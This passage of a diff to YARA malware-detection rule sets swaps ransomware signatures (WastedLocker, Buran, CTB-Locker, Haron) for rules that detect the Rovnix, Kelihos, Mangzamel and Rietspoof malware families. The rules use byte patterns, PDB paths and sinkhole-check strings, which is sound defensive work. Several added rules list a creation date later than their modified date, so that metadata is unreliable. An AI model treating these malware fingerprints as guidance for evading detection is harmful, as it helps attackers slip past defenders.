73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 }
-		$s2 = { 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 }
-		$s3 = { 2F 00 75 00 70 00 6C 00 6F 00 61 00 64 00 2F 00 25 00 73 00 5F 00 25 00 64 00 5F 00 25 00 73 00 }
-		$s4 = { 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 43 6F 6E 74 72 6F 6C 5C 53 65 73 73 69 6F 6E 20 4D 61 6E 61 67 65 72 }
-		$s5 = { 5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 }
+		$pdb = "\\work\\code\\2008-7-8muma\\mywork\\winInet_winApplication2009-8-7\\mywork\\aaaaaaa\\Release\\aaaaaaa.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and any of them
 }
-rule TRELLIX_ARC_RANSOM_Wastedlocker : RANSOMWARE FILE
+rule TRELLIX_ARC_Rovnix_Downloader : DOWNLOADER
 {
 	meta:
-		description = "Rule to detect unpacked samples of WastedLocker"
-		author = "McAfee ATR Team"
-		id = "900923cf-75c0-5342-858d-fe1ffa9486bd"
-		date = "2020-07-27"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wastedlocker.yar#L1-L32"
+		description = "Rovnix downloader with sinkhole checks"
+		author = "Intel Security"
+		id = "d51f8f73-7a3a-5ccf-9122-86061b5399f1"
+		date = "2026-03-01"
+		modified = "2020-08-14"
+		reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Rovnix.yar#L1-L38"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "c5adf88a46c34c8683d0e3d70529b352c77209f004e6c638ff079ea025921781"
+		logic_hash = "52cde40c95436129b7d48b4bd5e78b66deb84fdc84a76cc9ac72f24e0777e540"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/WastedLocker"
+		quality = 43
+		tags = "DOWNLOADER"
+		malware_type = "downloader"
+		malware_family = "Downloader:W32/Rovnix"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "ae255679f487e2e9075ffd5e8c7836dd425229c1e3bd40cfc46fbbceceec7cf4"
 
 	strings:
-		$pattern_0 = { 8d45fc 50 53 53 6a19 ff75f8 }
-		$pattern_1 = { 66833b00 8bf3 0f8485000000 8b7d10 8b472c 85c0 7410 }
-		$pattern_2 = { e8???????? 8b4d08 8b4518 8d0441 6683600200 83c40c 837d1400 }
-		$pattern_3 = { 8701 e9???????? 8bc7 5f 5e 5b }
-		$pattern_4 = { 8bf8 3bfb 742f 53 8d45fc 50 56 }
-		$pattern_5 = { 6a10 8d45f0 6a00 50 e8???????? 83c40c 5e }
-		$pattern_6 = { 5f 5d c20800 55 8bec }
-		$pattern_7 = { 8d7e04 ff15???????? 85c0 8945e8 740e 2b4510 }
-		$pattern_8 = { ff15???????? 8b45dc 8b4dbc 69c00d661900 055ff36e3c 8945dc }
-		$pattern_9 = { 8b4d08 8b19 03d8 f7d0 c1c60f 03f2 0bc6 }
+		$sink1 = "control"
+		$sink2 = "sink"
+		$sink3 = "hole"
+		$sink4 = "dynadot"
+		$sink5 = "block"
+		$sink6 = "malw"
+		$sink7 = "anti"
+		$sink8 = "googl"
+		$sink9 = "hack"
+		$sink10 = "trojan"
+		$sink11 = "abuse"
+		$sink12 = "virus"
+		$sink13 = "black"
+		$sink14 = "spam"
+		$boot = "BOOTKIT_DLL.dll"
+		$mz = { 4D 5A }
 
 	condition:
-		7 of them and filesize < 1806288
+		$mz in ( 0 .. 2 ) and all of ( $sink* ) and $boot
 }
-rule TRELLIX_ARC_Buran_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Kelihos_Botnet_Pdb : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect Buran ransomware"
+		description = "Rule to detect Kelihos malware based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "b96c0e5c-dce2-559d-9623-81e8a9a322f2"
-		date = "2019-11-05"
+		id = "2b6683a1-ba19-586b-8a92-89d4764efa12"
+		date = "2013-09-04"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Buran.yar#L1-L27"
+		reference = "https://www.malwaretech.com/2017/04/the-kelihos-botnet.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_kelhios_botnet_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "056cf2e6aca22876fb8bfafc14a3be0e42124a26edab42a6f7a928c87fb8fff4"
+		hash = "f0a6d09b5f6dbe93a4cf02e120a846073da2afb09604b7c9c12b2e162dfe7090"
+		logic_hash = "f60fb85161f86653f390b444d568da24cf07b3be99856230156741e8451e2a3f"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Buran"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Kelihos"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 5? 8B ?? 81 C? ?? ?? ?? ?? 5? 5? 5? 33 ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? C6 ?? ?? ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 8D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? E8 ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 }
-		$s2 = { 4? 33 ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? 8B ?? FF 5? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? E8 ?? ?? ?? ?? 85 ?? 74 }
-		$s3 = { A1 ?? ?? ?? ?? 99 5? 5? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 03 ?? ?? ?? 13 ?? ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 4? 99 89 ?? ?? 89 ?? ?? FF 7? ?? FF 7? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 3B ?? ?? 75 }
-		$s4 = { 5? 5? 5? 5? 8B ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 68 ?? ?? ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 89 ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 }
-		$s5 = { 5? 8B ?? 83 ?? ?? 5? 5? 5? 89 ?? ?? 8B ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 83 ?? ?? 5? 5? A1 ?? ?? ?? ?? 99 E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? 8B ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 2B ?? 8B ?? 4? 5? 8B ?? ?? 8B ?? 83 ?? ?? B9 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 0F 8C }
+		$pdb = "\\Only\\Must\\Not\\And.pdb"
+		$pdb1 = "\\To\\Access\\Do.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1440KB and any of them
 }
-rule TRELLIX_ARC_Backdoorfckg : CTB_LOCKER_RANSOMWARE RANSOMWARE
+rule TRELLIX_ARC_Malw_Mangzamel_Trojan : TROJAN FILE
 {
 	meta:
-		description = "CTB_Locker"
-		author = "ISG"
-		id = "2a00551d-1f80-5991-9416-d9b1b39db8e9"
-		date = "2015-01-20"
+		description = "Rule to detect Mangzamel  trojan based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "ca77180f-6133-5edb-a36b-78bc6f18d80c"
+		date = "2014-06-25"
 		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_CTBLocker.yar#L1-L26"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_mangzamel_trojan_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "a334b07053db66aa0fb2d2b2ca7f94c480509041724ddd4dd1708052d75baffb"
+		hash = "4324580ea162a636b7db1efb3a3ba38ce772b7168b4eb3a149df880a47bd72b7"
+		logic_hash = "bab103c671445e0ea916fae290689d30d45021bdca58a495ebd3d6ca9ca55051"
 		score = 75
-		quality = 20
-		tags = "CTB_LOCKER_RANSOMWARE, RANSOMWARE"
+		quality = 70
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/CTBLocker"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Mangzamel"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-		$stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-		$string2 = "keme132.DLL"
-		$string3 = "klospad.pdb"
+		$pdb = "\\svn\\sys\\binary\\i386\\agony.pdb"
+		$pdb1 = "\\Windows\\i386\\ndisdrv.pdb"
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 360KB and any of them
 }
-/*
- * YARA Rule Set
- * Repository Name: Arkbird SOLG
- * Repository: https://github.com/StrangerealIntel/DailyIOC
- * Retrieval Date: 2026-02-22
- * Git Commit: a873ff1298c43705e9c67286f3014f4300dd04f7
- * Number of Rules: 215
- * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * NO LICENSE SET
- */
-rule ARKBIRD_SOLG_RAN_Haron_Aug_2021_1 : FILE
+rule TRELLIX_ARC_Rietspoof_Loader : RANSOMWARE FILE
 {
 	meta:
-		description = "Detect Haron locker"
-		author = "Arkbird_SOLG"
-		id = "5900ad0e-66ca-5127-b8c2-cc23ace8929f"
-		date = "2021-08-09"
-		modified = "2021-08-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-09/RAN_Haron_Aug_2021_1.yara#L1-L22"
-		license_url = "N/A"
-		logic_hash = "5001041d9bb8acc0fa5e0e3b4cfacc5a891bed6885101ae3513b5524c91c572d"
+		description = "Rule to detect the Rietspoof loader"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "f306e381-e2ae-528e-937b-aced72356d77"
+		date = "2026-03-01"
+		modified = "2020-08-14"
+		reference = "https://blog.avast.com/rietspoof-malware-increases-activity"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_rietspoof_loader.yar#L1-L22"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "d72b58ff452070e03d0b25bc433ef5c677df77dd440adc1ecdb592cee24235fb"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2"
-		hash2 = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c"
-		tlp = "white"
-		adversary = "Haron"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Loader:W32/Rietspoof"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 02 17 8d ?? 00 00 01 [2] 16 20 [2] 00 00 20 00 ?? 00 00 [1-5] 73 [2] 01 00 0a a2 ?? 7d ?? 01 00 0a }
-		$s2 = { 03 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 }
-		$s3 = { 1f 38 16 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 13 07 7e ?? 01 00 0a 13 0b 11 07 11 0b 11 06 6e 1f 60 6a d7 88 20 00 30 00 00 1f 40 28 ?? 00 00 06 28 ?? 01 00 0a b8 13 08 11 07 02 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 28 ?? 01 00 0a b8 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 84 b8 13 09 11 07 02 7e }
-		$s4 = { 1f 18 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 0a 7e ?? 01 00 0a 0b 06 07 28 ?? 01 00 0a 0c 08 2c 04 07 0d 2b 6f 12 04 fe 15 ?? 00 00 02 12 04 11 04 28 ?? 00 00 2b b8 7d ?? 00 00 04 06 12 04 28 ?? 00 00 06 0c 08 2c 4a 12 04 7c ?? 00 00 04 28 ?? 01 00 0a 20 ff ff ff 7f 6a fe 02 16 fe 01 13 05 11 05 2c 17 03 12 04 7b ?? 00 00 04 17 28 ?? 01 00 0a 16 fe 01 13 06 11 06 2d 0c 06 12 04 28 ?? 00 00 06 2d c2 2b 0a 12 04 7b ?? 00 00 04 0d 09 2a 07 0d 09 2a }
-		$s5 = { 28 0e 00 00 0a 0b 16 0c 38 84 01 00 00 07 08 9a 0a 06 6f ?? 01 00 0a 20 00 00 80 0c 6a 3e 66 01 00 00 06 6f 0d 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 28 21 00 00 0a 39 4c 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 2d 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 0e 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a ef 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a d0 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a b1 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 92 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 76 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 5a 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 3e 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 22 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 06 06 6f 26 00 00 0a de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 73 fe ff ff 20 c4 09 00 00 28 18 00 00 0a dd 57 fe ff ff 26 dd 51 fe ff ff }
